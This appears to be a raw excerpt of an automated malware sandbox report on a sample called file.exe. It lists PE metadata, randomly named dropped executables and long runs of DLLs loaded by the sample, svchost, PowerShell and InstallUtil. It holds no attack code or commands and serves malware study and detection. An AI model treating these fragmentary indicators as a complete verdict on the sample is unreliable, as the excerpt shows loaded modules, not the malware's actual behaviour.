                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: String function: 004344DC appears 32 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: String function: 004078F4 appears 43 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: String function: 00403494 appears 83 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: String function: 00403684 appears 225 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: String function: 00453344 appears 97 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: String function: 004460A4 appears 59 times
                        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
                        Source: file.exe Static PE information: invalid certificate
                        Source: RjS1Nhdf06REy5J9bfLmGhpU.exe.8.dr Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: f3pOxPQt48GSFGTaAT61XRX4.exe.8.dr Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: 6mUOGmYOgu78GIQPbKV3WDdm.exe.8.dr Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: OGlsLpt3IrpM6JOWnTsyCqhd.exe.8.dr Static PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: DdT3rCn1HYZaeiTB6islHQa6.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: HTdfKOlxDXLXF51uNbI6vixn.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: yjgJ9nt4OTDWzyoY4NSDLOwM.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: CpPXXcmjwTrziBJjEjzVBqIO.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: UMNq6JQCwcuFbKEJ00C7NaNb.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: WHjVEyd48wD2Vps4mOrN0xgt.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: cBFvqvrl6uXFbTB4JYYj3iX2.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: pqTEuXs4oMBqF8pyFu5iVhTO.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: dJWgkx2NkzIq27ZmDKfJlJSb.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: nNmaiuLbBvtjFhtSarVAt2ZV.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: JmSupDwlA9Oqy8L5plKWP6Oj.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: Z7skxxTmXai6Pa9s6OHd8pTL.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: NRQOltVD0acQXnzUvV0AHMDa.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: file.exeStatic PE information: No import functions for PE file found
                        Source: file.exe, 00000000.00000000.1736862895.000001F8171C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewWorldOrderIsComingSoon.exeT vs file.exe
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
